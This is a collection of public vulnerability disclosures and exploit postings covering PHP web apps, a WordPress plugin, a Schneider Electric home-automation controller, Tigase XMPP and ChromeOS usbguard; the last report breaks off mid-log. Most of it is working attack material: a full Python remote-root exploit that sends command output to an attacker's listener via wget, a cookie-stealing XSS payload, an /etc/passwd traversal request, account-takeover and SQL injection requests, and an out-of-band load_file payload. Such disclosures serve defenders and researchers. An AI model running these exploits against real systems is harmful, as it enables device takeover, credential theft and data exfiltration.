<pre><code>## Title: Fast Food Ordering System 1.0 Stored Cross-Site Scripting<br />## Author: Ashish Kumar<br />## Date: 05.31.2022<br />## Vendor: https://www.sourcecodester.com/users/tips23<br />## Software:<br />https://www.sourcecodester.com/php/15366/fast-food-ordering-system-phpoop-free-source-code.html<br />## Reference:<br />https://medium.com/@cyberthoth/fast-food-ordering-system-1-0-cross-site-scripting-7927f4b1edd6<br /><br />#Description:<br />#The Line 255 of Master.php sends unvalidated data to a web browser, which<br />can result in the browser executing malicious code.<br /><br />#echo $Master->save_category();<br /><br />#PoC:<br />POST /ffos/classes/Master.php?f=save_category HTTP/1.1<br />Host: localhost<br />Content-Length: 480<br />sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"<br />Accept: application/json, text/javascript, */*; q=0.01<br />Content-Type: multipart/form-data;<br />boundary=----WebKitFormBoundarySmYVeqOBMhcSziZM<br />X-Requested-With: XMLHttpRequest<br />sec-ch-ua-mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36<br />(KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36<br />sec-ch-ua-platform: "Windows"<br />Origin: http://localhost<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: http://localhost/ffos/admin/?page=categories<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-GB,en-US;q=0.9,en;q=0.8<br />Cookie: PHPSESSID=junl7tbvb7hvrdeq776aislbcj<br />Connection: close<br /><br />------WebKitFormBoundarySmYVeqOBMhcSziZM<br />Content-Disposition: form-data; name="id"<br /><br />10<br />------WebKitFormBoundarySmYVeqOBMhcSziZM<br />Content-Disposition: form-data; name="name"<br /><br />XSS<br />------WebKitFormBoundarySmYVeqOBMhcSziZM<br />Content-Disposition: form-data; name="description"<br /><br />Testing XSS "><img src="" onerror="alert(document.cookie)"><br />------WebKitFormBoundarySmYVeqOBMhcSziZM<br />Content-Disposition: form-data; name="status"<br /><br />1<br />------WebKitFormBoundarySmYVeqOBMhcSziZM--<br /></code></pre>
<pre><code>#!/usr/bin/env python3<br /># -*- coding: utf-8 -*-<br />#<br />#<br /># Schneider Electric C-Bus Automation Controller (5500SHAC) 1.10 Remote Root Exploit<br />#<br />#<br /># Vendor: Schneider Electric SE<br /># Product web page: https://www.se.com | https://www.clipsal.com<br /># Product details:<br /># - https://www.clipsal.com/Trade/Products/ProductDetail?catno=5500SHAC<br /># - https://www.se.com/ww/en/product/5500AC2/application-controller-spacelogic-cbus-rs232-485-ethernet-din-mount-24v-dc/<br /># Affected version: CLIPSAL 5500SHAC (i.MX28)<br /># CLIPSAL 5500NAC (i.MX28)<br /># SW: 1.10.0, 1.6.0<br /># HW: 1.0<br /># Potentially vulnerable (alternative products/same codebase?): 5500NAC2 and 5500AC2<br /># SpaceLogic C-Bus<br />#<br /># Summary: The C-Bus Network Automation Controller (5500NAC) and the Wiser<br /># for C-Bus Automation Controller (5500SHAC)) is an advanced controller from<br /># Schneider Electric. It is specifically designed to unite the C-Bus home<br /># automation solution with common household communication protocols, from<br /># lighting and climate control, to security, entertainment and energy metering.<br /># The Wiser for C-Bus Automation Controller manages and controls C-Bus systems<br /># for residential homes or zones within a building and integrates functions<br /># such as heating/cooling, energy/load monitoring and remote control for C-Bus<br /># and Modbus.<br />#<br /># Desc: The automation controller suffers from an authenticated arbitrary<br /># command execution vulnerability. An attacker can abuse the Start-up (init)<br /># script editor and exploit the 'script' POST parameter to insert malicious<br /># Lua script code and execute commands with root privileges that will grant<br /># full control of the device.<br />#<br /># ------------------------------------------------------------------------------<br /># $ ./c-bus.py http://192.168.0.10 "cat /etc/config/httpd;id" 192.168.0.37 8888<br /># ----------------------------------------------------------------------<br /># Starting Z-Bus 2.5.1 ( https://zeroscience.mk ) at 15.03.2022 11:26:38<br /># [*] Starting exfiltration handler on port 8888<br /># [*] Writing Lua initscript... done.<br /># [*] Running os.execute()... done.<br /># [*] Got request from 192.168.0.10:33522<br /># [*] Printing target's request:<br />#<br /># b"GET / HTTP/1.1\r\nHost: 192.168.0.37:8888\r\nUser-Agent: \nconfig user<br /># 'admin'\n\toption password 'admin123'\n\nconfig user 'remote'\n\toption<br /># password 'remote'\n\nuid=0(root) gid=0(root) groups=0(root)\r\nConnection:<br /># close\r\n\r\n"<br />#<br /># [*] Cleaning up... done.<br />#<br /># $ <br /># ------------------------------------------------------------------------------<br />#<br /># Tested on: CPU model: ARM926EJ-S rev 5 (v5l)<br /># GNU/Linux 4.4.115 (armv5tejl)<br /># LuaJIT 2.0.5<br /># FlashSYS v2<br /># nginx<br />#<br />#<br /># Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /># Macedonian Information Security Research and Development Laboratory<br /># Zero Science Lab - https://www.zeroscience.mk - @zeroscience<br />#<br />#<br /># Advisory ID: ZSL-2022-5707<br /># Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5707.php<br />#<br />#<br /># 12.03.2022<br />#<br /><br />import threading#!<br />import datetime##!<br />import requests##!<br />import socket####!<br />import time######!<br />import sys#######!<br />import re########!<br /><br />from requests.auth import HTTPBasicAuth<br />from time import sleep as spikaj<br /><br />class Wiser:<br /><br /> def __init__(self):<br /> self.headers = None<br /> self.uri = '/scada-main/scripting/'<br /> self.savs = self.uri + 'save'<br /> self.runs = self.uri + 'run'<br /> self.start = datetime.datetime.now()<br /> self.start = self.start.strftime('%d.%m.%Y %H:%M:%S')<br /> self.creds = HTTPBasicAuth('admin', 'admin123')<br /><br /> def memo(self):<br /> if len(sys.argv) != 5:<br /> self.use()<br /> else:<br /> self.target = sys.argv[1]<br /> self.execmd = sys.argv[2]<br /> self.localh = sys.argv[3]<br /> self.localp = int(sys.argv[4])<br /> if not 'http' in self.target:<br /> self.target = 'http://{}'.format(self.target)<br /><br /> def exfil(self):<br /> print('[*] Starting exfiltration handler on port {}'.format(self.localp))<br /> s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br /> s.bind(('0.0.0.0', self.localp))<br /> while True:<br /> try:<br /> s.settimeout(9)<br /> s.listen(1)<br /> conn, addr = s.accept()<br /> print('[*] Got request from {}:{}'.format(addr[0], addr[1]))<br /> data = conn.recv(2003)<br /> print('[*] Printing target\'s request:')<br /> print('\n%s' %data)<br /> except socket.timeout as p:<br /> print('[!] Something\'s not right. Check your port mappings!')<br /> break<br /> s.close()<br /> self.clean()<br /><br /> def mtask(self):<br /> konac = threading.Thread(name='thricer.exe', target=self.exfil)<br /> konac.start()<br /> self.byts()<br /><br /> def byts(self):<br /> self.headers = {<br /> 'Referer':self.target+'/scada-main/main/editor?id=initscript',<br /> 'Sec-Ch-Ua':'"(Not(A:Brand";v="8", "Chromium";v="98"',<br /> 'Cookie':'x-logout=0; x-auth=; x-login=1; pin=',<br /> 'Content-Type':'text/plain;charset=UTF-8',<br /> 'User-Agent':'SweetHomeAlabama/2003.59',<br /> 'X-Requested-With':'XMLHttpRequest',<br /> 'Accept-Language':'en-US,en;q=0.9',<br /> 'Accept-Encoding':'gzip, deflate',<br /> 'Sec-Ch-Ua-Platform':'"Windows"',<br /> 'Sec-Fetch-Site':'same-origin',<br /> 'Connection':'keep-alive',<br /> 'Sec-Fetch-Dest':'empty',<br /> 'Sec-Ch-Ua-Mobile':'?0',<br /> 'Sec-Fetch-Mode':'cors',<br /> 'Origin':self.target,<br /> 'Accept':'*/*',<br /> 'sec-gpc':'1'<br /> }<br /> <br /> self.loada = '\x64\x61\x74\x61\x3D\x7B' # data={<br /> self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x34\x22\x3A\x22\x22\x2C' # "ext-comp-1004":"",<br /> self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x35\x22\x3A\x22\x22\x2C' # "ext-comp-1005":"",<br /> self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x36\x22\x3A\x22\x22\x2C' # "ext-comp-1006":"",<br /> self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x37\x22\x3A\x22\x22\x2C' # "ext-comp-1007":"",<br /> self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x38\x22\x3A\x22\x22\x2C' # "ext-comp-1008":"",<br /> self.loada += '\x22\x73\x63\x61\x64\x61\x2D\x68\x65\x6C\x70\x2D\x73\x65\x61\x72\x63\x68\x22\x3A\x22\x22\x2C' # "scada-help-search":"",<br /> self.loada += '\x22\x69\x64\x22\x3A\x22\x69\x6E\x69\x74\x73\x63\x72\x69\x70\x74\x22\x2C' # "id":"initscript",<br /> self.loada += '\x22\x73\x63\x72\x69\x70\x74\x22\x3A\x6E\x75\x6C\x6C\x2C' # "script":null,<br /> self.loada += '\x22\x73\x63\x72\x69\x70\x74\x6F\x6E\x6C\x79\x22\x3A\x22\x74\x72\x75\x65\x22\x7D' # "scriptonly":"true"}<br /> self.loada += '\x26\x73\x63\x72\x69\x70\x74\x3D\x6F\x73\x2E\x65\x78\x65\x63\x75\x74\x65' # &script=os.execute<br /> self.loada += '\x28\x27\x77\x67\x65\x74\x20\x2D\x55\x20\x22\x60' # ('wget -U "`<br /> self.loada += self.execmd # [command input]<br /> self.loada += '\x60\x22\x20' # `".<br /> self.loada += self.localh+':'+str(self.localp) # [listener input]<br /> self.loada += '\x27\x29' # ')<br /> self.loadb = '\x64\x61\x74\x61\x3D\x7B' # data={<br /> self.loadb += '\x22\x69\x64\x22\x3A\x22\x69\x6E\x69\x74\x73\x63\x72\x69\x70\x74\x22\x7D' # "id":"initscript"}<br /> <br /> print('[*] Writing Lua initscript... ', end='')<br /> sys.stdout.flush()<br /> spikaj(0.7)<br /><br /> htreq = requests.post(self.target+self.savs, data=self.loada, headers=self.headers, auth=self.creds)<br /> if not 'success' in htreq.text:<br /> print('didn\'t work!')<br /> exit(17)<br /> else:<br /> print('done.')<br /> <br /> print('[*] Running os.execute()... ', end='')<br /> sys.stdout.flush()<br /> spikaj(0.7)<br /><br /> htreq = requests.post(self.target+self.runs, data=self.loadb, headers=self.headers, auth=self.creds)<br /> if not 'success' in htreq.text:<br /> print('didn\'t work!')<br /> exit(19)<br /> else:<br /> print('done.')<br /><br /> def splash(self):<br /> Baah_loon = '''<br /> ######<br /> ##########<br /> ###### _\_<br /> ##===----[.].]<br /> #( , _\\<br /> # )\__|<br /> \ /<br /> `-._``-'<br /> >@<br /> |<br /> |<br /> |<br /> |<br /> | Schneider Electric C-Bus SmartHome Automation Controller<br /> | Root Remote Code Execution Proof of Concept<br /> | ZSL-2022-5707<br /> |<br /> |<br /> |<br /> '''<br /> print(Baah_loon)<br /><br /> def use(self):<br /> self.splash()<br /> print('Usage: ./c-bus.py [target] [cmd] [lhost] [lport]')<br /> exit(0)<br /><br /> def clean(self):<br /> print('\n[*] Cleaning up... ', end='')<br /> sys.stdout.flush()<br /> spikaj(0.7)<br /><br /> self.headers = {'X-Requested-With':'XMLHttpRequest'}<br /><br /> self.blank = '\x64\x61\x74\x61\x3D\x25\x37\x42\x25\x32\x32'<br /> self.blank += '\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30'<br /> self.blank += '\x30\x34\x25\x32\x32\x25\x33\x41\x25\x32\x32'<br /> self.blank += '\x25\x32\x32\x25\x32\x43\x25\x32\x32\x65\x78'<br /><br /> self.dlank = '\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x35'<br /> self.dlank += '\x25\x32\x32\x25\x33\x41\x25\x32\x32\x25\x32'<br /> self.dlank += '\x32\x25\x32\x43\x25\x32\x32\x65\x78\x74\x2D'<br /> self.dlank += '\x63\x6F\x6D\x70\x2D\x31\x30\x30\x36\x25\x32'<br /><br /> self.clank = '\x32\x25\x33\x41\x25\x32\x32\x25\x32\x32\x25'<br /> self.clank += '\x32\x43\x25\x32\x32\x65\x78\x74\x2D\x63\x6F'<br /> self.clank += '\x6D\x70\x2D\x31\x30\x30\x37\x25\x32\x32\x25'<br /> self.clank += '\x33\x41\x25\x32\x32\x25\x32\x32\x25\x32\x43'<br /><br /> self.slank = '\x25\x32\x32\x65\x78\x74\x2D\x63\x6F\x6D\x70'<br /> self.slank += '\x2D\x31\x30\x30\x38\x25\x32\x32\x25\x33\x41'<br /> self.slank += '\x25\x32\x32\x25\x32\x32\x25\x32\x43\x25\x32'<br /> self.slank += '\x32\x73\x63\x61\x64\x61\x2D\x68\x65\x6C\x70'<br /><br /> self.glank = '\x2D\x73\x65\x61\x72\x63\x68\x25\x32\x32\x25'<br /> self.glank += '\x33\x41\x25\x32\x32\x25\x32\x32\x25\x32\x43'<br /> self.glank += '\x25\x32\x32\x69\x64\x25\x32\x32\x25\x33\x41'<br /> self.glank += '\x25\x32\x32\x69\x6E\x69\x74\x73\x63\x72\x69'<br /><br /> self.hlank = '\x70\x74\x25\x32\x32\x25\x32\x43\x25\x32\x32'<br /> self.hlank += '\x73\x63\x72\x69\x70\x74\x25\x32\x32\x25\x33'<br /> self.hlank += '\x41\x25\x32\x32\x25\x32\x32\x25\x32\x43\x25'<br /> self.hlank += '\x32\x32\x73\x63\x72\x69\x70\x74\x6F\x6E\x6C'<br /><br /> self.flank = '\x79\x25\x32\x32\x25\x33\x41\x25\x32\x32\x74'<br /> self.flank += '\x72\x75\x65\x25\x32\x32\x25\x37\x44'#######'<br /><br /> self.clear = f'{self.blank}{self.dlank}{self.clank}{self.slank}{self.glank}{self.hlank}{self.flank}'<br /> htreq = requests.post(self.target+self.savs, data=self.clear, headers=self.headers, auth=self.creds)<br /> if not 'success' in htreq.text:<br /> print('didn\'t work!')<br /> exit(18)<br /> else:<br /> print('done.')<br /> exit(-1)<br /><br /> def main(self):<br /> print('-'*70)<br /> print('Starting Z-Bus 2.5.1 ( https://zeroscience.mk ) at', self.start)<br /> self.memo(), self.mtask()<br /><br />if __name__ == '__main__':<br /> Wiser().main()<br /></code></pre>
<pre><code>RCE Security Advisory<br />https://www.rcesecurity.com<br /><br /><br />1. ADVISORY INFORMATION<br />=======================<br />Product: User Meta<br />Vendor URL: https://wordpress.org/plugins/user-meta<br />Type: Relative Path Traversal [CWE-23]<br />Date found: 2022-02-28<br />Date published: 2022-05-24<br />CVSSv3 Score: 4.3 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)<br />CVE: CVE-2022-0779<br /><br /><br />2. CREDITS<br />==========<br />This vulnerability was discovered and researched by Julien Ahrens from<br />RCE Security.<br /><br /><br />3. VERSIONS AFFECTED<br />====================<br />User Meta Lite 2.4.3 and below<br />User Meta Pro 2.4.3 and below<br /><br /><br />4. INTRODUCTION<br />===============<br />An easy-to-use user profile and management plugin for WordPress that allows<br />user login, reset-password, profile update and user registration with extra<br />fields, all on front-end and many more. User Meta Pro is a versatile user<br />profile builder and user management plugin for WordPress that has the most<br />features on the market. User Meta aims to be your only go to plugin for<br />user management.<br /><br />(from the vendor's homepage)<br /><br /><br />5. VULNERABILITY DETAILS<br />========================<br />The WordPress ajax action "um_show_uploaded_file" is vulnerable to an<br />authenticated path traversal when user-supplied input to the HTTP POST<br />parameter "filepath" is processed by the web application. Since the application<br />does not properly validate and sanitize this parameter, it is possible to<br />enumerate local server files using a blind approach. This is because the<br />application doesn't return the contents of the referenced file but instead<br />returns different form elements based on whether a file exists or not.<br /><br />The following Proof-of-Concept triggers this vulnerability:<br /><br />POST /wp-admin/admin-ajax.php HTTP/1.1<br />Host: localhost<br />Content-Length: 147<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />Cookie: [your-wordpress-auth-cookies]<br />Connection: close<br /><br />field_name=[your-field-name]&filepath=/../../../../../etc/passwd&field_id=[your-field-id]&form_key=[your-form-key]&action=um_show_uploaded_file&pf_nonce=[your-auth-nonce]&is_ajax=true<br /><br /><br />6. RISK<br />=======<br />The vulnerability can be used by an authenticated attacker to enumerate<br />local server files based on a blind approach.<br /><br /><br />7. SOLUTION<br />===========<br />Update to User Meta/User Meta Pro 2.4.4<br /><br /><br />8. REPORT TIMELINE<br />==================<br />2022-02-28: Discovery of the vulnerability<br />2022-02-28: WPScan (CNA) assigns CVE-2022-0779<br />2022-03-03: Contacted the vendor via their contact form<br />2022-03-06: Vendor response, acknowledgement of the issue<br />2022-03-18: Version 2.4.2 is released<br />2022-03-22: Vulnerability is still exploitable since fix was applied only client-side. Contacted vendor again.<br />2022-04-13: No response, contacted vendor again<br />2022-04-18: Vendor added a new fix to version 2.4.3. Asked to retest.<br />2022-04-19: Vulnerability is still exploitable due to a logic bug in the fix. Contacted vendor again.<br />2022-04-29: Vendor asks whether another fix in version 2.4.4 is fine<br />2022-05-16: Fix seems to work<br />2022-05-24: Public disclosure<br /><br /><br />9. REFERENCES<br />=============<br />https://github.com/MrTuxracer/advisories<br /><br /></code></pre>
<pre><code># Exploit Title: Ingredient Stock Management System v1.0 - Account Takeover (Unauthenticated)<br /># Date: 28/05/2022<br /># Exploit Author: Saud Alenazi<br /># Vendor Homepage: https://www.sourcecodester.com/<br /># Software Link: https://www.sourcecodester.com/php/15364/ingredients-stock-management-system-phpoop-free-source-code.html<br /># Version: 1.0<br /># Tested on: XAMPP, Linux<br /><br /><br /><br />Description :<br /><br />----------------------<br /><br />Ingredient Stock Management System v1.0 is vulnerable to unauthenticated account takeover.<br />An attacker can takeover any registered 'Staff' user account by just sending below POST request<br />By changing the the "id", "firstname", "lastname" , "username" , "password" ,"type" parameters<br /><br /><br /># HTTPS Request :<br /><br />POST /isms/classes/Users.php?f=save HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />X-Requested-With: XMLHttpRequest<br />Content-Type: multipart/form-data; boundary=---------------------------89160456138077069512415726555<br />Content-Length: 1023<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/isms/admin/?page=user/manage_user<br />Cookie: PHPSESSID=mia3uiom2s9bdtif290t6v1el2<br /><br />-----------------------------89160456138077069512415726555<br />Content-Disposition: form-data; name="id"<br /><br />1<br />-----------------------------89160456138077069512415726555<br />Content-Disposition: form-data; name="firstname"<br /><br />test<br />-----------------------------89160456138077069512415726555<br />Content-Disposition: form-data; name="middlename"<br /><br /><br />-----------------------------89160456138077069512415726555<br />Content-Disposition: form-data; name="lastname"<br /><br />hi<br />-----------------------------89160456138077069512415726555<br />Content-Disposition: form-data; name="username"<br /><br />test<br />-----------------------------89160456138077069512415726555<br />Content-Disposition: form-data; name="password"<br /><br />test<br />-----------------------------89160456138077069512415726555<br />Content-Disposition: form-data; name="type"<br /><br />1<br />-----------------------------89160456138077069512415726555<br />Content-Disposition: form-data; name="img"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />-----------------------------89160456138077069512415726555--<br /><br /><br />====<br />URL Login : http://localhost/isms/admin/login.php <br /></code></pre>
<pre><code># Exploit Title: Ingredient Stock Management System v1.0 - 'id' Blind SQL Injection<br /># Date: 28/05/2022<br /># Exploit Author: Saud Alenazi<br /># Vendor Homepage: https://www.sourcecodester.com/<br /># Software Link: https://www.sourcecodester.com/php/15364/ingredients-stock-management-system-phpoop-free-source-code.html<br /># Version: 1.0<br /># Tested on: XAMPP, Linux<br /><br /><br /><br />Description :<br />----------------------<br /><br />Ingredient Stock Management System 1.0 allows SQL Injection via parameter 'id' in<br />/isms/admin/stocks/view_stock.php. Exploiting this issue could allow an attacker to compromise<br />the application, access or modify data, or exploit latent vulnerabilities<br />in the underlying database<br /><br /><br /># Vulnerable Code :<br /><br />line 74 in file "/isms/admin/stocks/view_stock.php"<br /><br />$stockins = $conn->query("SELECT * FROM `stockin_list` where item_id = '{$id}' order by date(`date`) asc");<br /><br /># Sqlmap command:<br /><br />sqlmap -u 'http://localhost/isms/admin/?page=stocks/view_stock&id=1' -p id --level=5 --risk=3 --dbs --random-agent --eta<br /><br /># Output:<br /><br />Parameter: id (GET)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: page=stocks/view_stock&id=1' AND 1902=1902 AND 'yluX'='yluX<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: page=stocks/view_stock&id=1' AND (SELECT 6709 FROM (SELECT(SLEEP(5)))gZCj) AND 'vMqP'='vMqP<br /><br /></code></pre>
<pre><code>## Title: Fast Food Ordering System 1.0 SQLi<br />## Author: nu11secur1ty<br />## Date: 05.30.2022<br />## Vendor: https://www.sourcecodester.com/users/tips23<br />## Software: https://www.sourcecodester.com/php/15366/fast-food-ordering-system-phpoop-free-source-code.html<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Fast-Food-Ordering<br /><br /><br /><br />## Description:<br />The date parameter appears to be vulnerable to SQL injection attacks.<br />The payload '+(select<br />load_file('\\\\j7r9s1wbepgqucip3y4eqrwzjqpkdb3zu2it5kt9.kakmoesitolkovatupiuporit.we\\wrk'))+'<br />was submitted in the date parameter.<br />This payload injects a SQL sub-query that calls MySQL's load_file<br />function with a UNC file path that references a URL on an external<br />domain.<br />The attacker can take administrator accounts control and also of all<br />accounts on this system, also the malicious user can download all<br />information about this system.<br /><br />Status: CRITICAL<br /><br />[+] Payloads:<br /><br />```mysql<br />---<br />Parameter: date (GET)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause (NOT)<br /> Payload: page=reports&date=2022-05-30'+(select<br />load_file('\\\\j7r9s1wbepgqucip3y4eqrwzjqpkdb3zu2it5kt9.kakmoesitolkovatupiuporit.we\\wrk'))+''<br />OR NOT 9209=9209 AND 'OBPK'='OBPK<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: page=reports&date=2022-05-30'+(select<br />load_file('\\\\j7r9s1wbepgqucip3y4eqrwzjqpkdb3zu2it5kt9.kakmoesitolkovatupiuporit.we\\wrk'))+''<br />AND (SELECT 1113 FROM(SELECT COUNT(*),CONCAT(0x7178716271,(SELECT<br />(ELT(1113=1113,1))),0x71706a7671,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'BQRx'='BQRx<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: page=reports&date=2022-05-30'+(select<br />load_file('\\\\j7r9s1wbepgqucip3y4eqrwzjqpkdb3zu2it5kt9.kakmoesitolkovatupiuporit.we\\wrk'))+''<br />AND (SELECT 2021 FROM (SELECT(SLEEP(5)))KAaB) AND 'ECXY'='ECXY<br /><br /> Type: UNION query<br /> Title: MySQL UNION query (NULL) - 6 columns<br /> Payload: page=reports&date=2022-05-30'+(select<br />load_file('\\\\j7r9s1wbepgqucip3y4eqrwzjqpkdb3zu2it5kt9.kakmoesitolkovatupiuporit.we\\wrk'))+''<br />UNION ALL SELECT<br />NULL,NULL,NULL,CONCAT(0x7178716271,0x785874484e685679414c78427953454c4b62524778654f596e645841574978764f414a7a6d616372,0x71706a7671),NULL,NULL,NULL,NULL,NULL#<br />---<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Fast-Food-Ordering)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/kkyrgk)<br /><br /></code></pre>
<pre><code>Tigase XMPP server: XMPP stanza smuggling via unescaped qutes<br /><br />Tigase XMPP server suffers from a security vulnerability due to not escaping double quote character when serializing parsed XML. This can be used to \"smuggle\" (or, if you prefer, inject) arbitrary attacker-controlled stanza in the XMPP server's output stream. A malicious client can abuse this vulnerability to send arbitrary XMPP stanzas to another client (including the control stanzas that are only meant to be sent by the server).<br /><br />Consider for example the following XML tag<br /><br /><foo attr='aaa\"bbb' /><br /><br />which contains a single attribute enclosed in *single* quotes.<br /><br />When Tigase parses and then serializes the element, it will convert single quotes to double quotes, however it will not escape the double quote. Thus the output becomes<br /><br /><foo attr=\"aaa\"bbb\" /><br /><br />Which is invalid XML. The corresponding code for serializing attributes can be seen in https://github.com/tigase/tigase-xmltools/blob/b0c64df99f62b88bec7c152d52027369b6415ada/src/main/java/tigase/xml/Element.java#L845<br /><br />To see how this issue can be used to smuggle arbitrary stanzas through the server, consider for example the following incoming stanza<br /><br /><message ...><br /> <body><br /> <body a='a\"/>' >text</body><br /> <message a='a\"/>' >text</message><br /> <iq>...</iq><br /> <message a='a\">' /><br /> <body a='a\">' /><br /> </body><br /></message><br /><br />When this stanza gets parsed by the server, the corresponding tree is<br /><br /> -message<br /> --body<br /> ---body with attribute name=a value=a\"/><br /> ----cdata=text<br /> ---message with attribute name=a value=a\"/><br /> ----cdata=text<br /> ---iq<br /> ---message with attribute name=a value=a\"><br /> ---body with attribute name=a value=a\"><br /> <br />However, when such a stanza gets serialized and forwarded to the recipient client (or another XMPP server) it becomes<br /><br /><message ...><body><body a=\"a\"/>\" >text</body><message a=\"a\"/>\" >text</message><iq>...</iq><message a=\"a\">\" /><body a=\"a\">\" /></body></message><br /><br />(single quoted attributes became double quoted)<br />When the receiving client parses it, the corresponding tree is seen as<br /><br /> -message<br /> --body<br /> ---body with attribute name=a value=a<br /> ---cdata=\" >text<br /> --message with attribute name=a value=a<br /> --cdata=\" >text<br /> -iq<br /> -message with attribute name=a value=a<br /> --cdata=>\" /><br /> --body with attribute name=a value=a<br /> ---cdata=>\" /><br /><br />This works because, after the quote, we used '/>' instead of '>' and vice-versa to change the semantics of the closing tags.<br /><br />As can be seen in the tree above, the receiving client will consider the iq tag (that was originally a part of the message body tree) as a new stanza at the same \"depth\" in the XML tree as the message stanza.<br /><br />As mentioned above, this can be used to \"smuggle\" arbitrary stanzas through the XMPP server to the victim client. This can be used for message spoofing (making it appear a message was sent by a different sender), but also, depending on the XMPP extensions the client implements and what data is sent over XMPP, it can have impact beyond that (e.g. potentially redirecting the connection through a malicious XMPP server, code execution).<br /><br />This bug is subject to a 90-day disclosure deadline. If a fix for this<br />issue is made available to users before the end of the 90-day deadline,<br />this bug report will become public 30 days after the fix was made<br />available. Otherwise, this bug report will become public at the deadline.<br />The scheduled deadline is 2022-06-12.<br /><br /><br /><br /><br />Found by: ifratric@google.com<br /><br /></code></pre>
<pre><code>ChromeOS' usage of usbguard is bypassable<br /><br />VULNERABILITY DETAILS<br />ChromeOS uses https://usbguard.github.io/ when the screen is locked (but not<br />on the login screen, perhaps because it is expected that code execution is much<br />less helpful when the disk is still encrypted?).<br /><br />When the screen is locked, a policy is applied that might look like this<br />(example from my Pixelbook):<br /><br />```<br />allow id 0bda:564b serial \"\\x07LOE65001063010A78M015CFAI06BF12000\" name \"WebCamera\" hash \"KsByWtMB5JtGNDimauArXMiZOThFwagdTWeQsMAZ48c=\" with-interface { 0e:01:00 0e:02:00 0e:02:00 0e:02:00 0e:02:00 0e:02:00 0e:02:00 0e:02:00 0e:02:00 } with-connect-type \"hardwired\"<br />allow id 1d6b:0002 serial \"0000:00:14.0\" name \"xHCI Host Controller\" hash \"jEP/6WzviqdJ5VSeTUY8PatCNBKeaREvo2OqdplND/o=\" with-interface 09:00:00 with-connect-type \"\"<br />allow id 1d6b:0003 serial \"0000:00:14.0\" name \"xHCI Host Controller\" hash \"3Wo3XWDgen1hD5xM3PSNl3P98kLp1RUTgGQ5HSxtf8k=\" with-interface 09:00:00 with-connect-type \"\"<br />allow id 8087:0a2a serial \"\" name \"\" hash \"AyPZWy2XK0931kB9A/owYfk5xHEqnpDsJfdeLSGIyuk=\" with-interface { e0:01:01 e0:01:01 e0:01:01 e0:01:01 e0:01:01 e0:01:01 e0:01:01 } with-connect-type \"hardwired\"<br />####################################################################################################<br /># Footer.<br />####################################################################################################<br />block with-interface one-of { 05:*:* 06:*:* 07:*:* 08:*:* } # physical, image, printer, storage<br />allow<br />```<br /><br />As you can see, it mostly just allowlists specific devices with full hashes of<br />the expected USB configuration descriptors, and internal USB devices are marked<br />such that they won't be accepted on external USB ports.<br />(Which, by the way, might not actually be necessary, since the USB subsystem's<br />`authorized_default` flag is set to 2 when the screen is locked, not 0, meaning<br />internal USB devices are automatically allowed anyway?)<br /><br />But then at the bottom is this footer that blocks USB devices with interface<br />descriptors that contain the following `bInterfaceClass` values:<br /><br /> - USB_CLASS_PHYSICAL (5)<br /> - USB_CLASS_STILL_IMAGE (6)<br /> - USB_CLASS_PRINTER (7)<br /> - USB_CLASS_MASS_STORAGE (8)<br /><br />Afterwards, anything else is permitted.<br /><br />This configuration footer comes from<br /><https://source.chromium.org/chromiumos/chromiumos/codesearch/+/main:src/third_party/chromiumos-overlay/sys-apps/usbguard/files/99-rules.conf>.<br />The interface-based classification of devices was introduced in<br /><https://chromium-review.googlesource.com/c/chromiumos/overlays/chromiumos-overlay/+/1217622/>.<br /><br /><br />Apart from the problem that there is a large amount of attack surface in drivers<br />for devices that don't belong into those USB interface classes, there is another<br />issue with this approach:<br /><br />The kernel often doesn't care what USB class a device claims to be. The way USB<br />drivers tend to work, even for standardized protocols, is that the driver<br />specifies with low priority that it would like to bind to standards-compliant<br />devices using the proper USB interface class, but also specifies with high<br />priority that it would like to bind to specific USB devices based on Vendor ID<br />and Product ID, without caring about their USB interface class.<br /><br /><br />As an example, USB_CLASS_MASS_STORAGE is blocklisted, so a USB stick inserted<br />while the screen is locked doesn't get past the authorization check:<br /><br />[ 6411.611320] 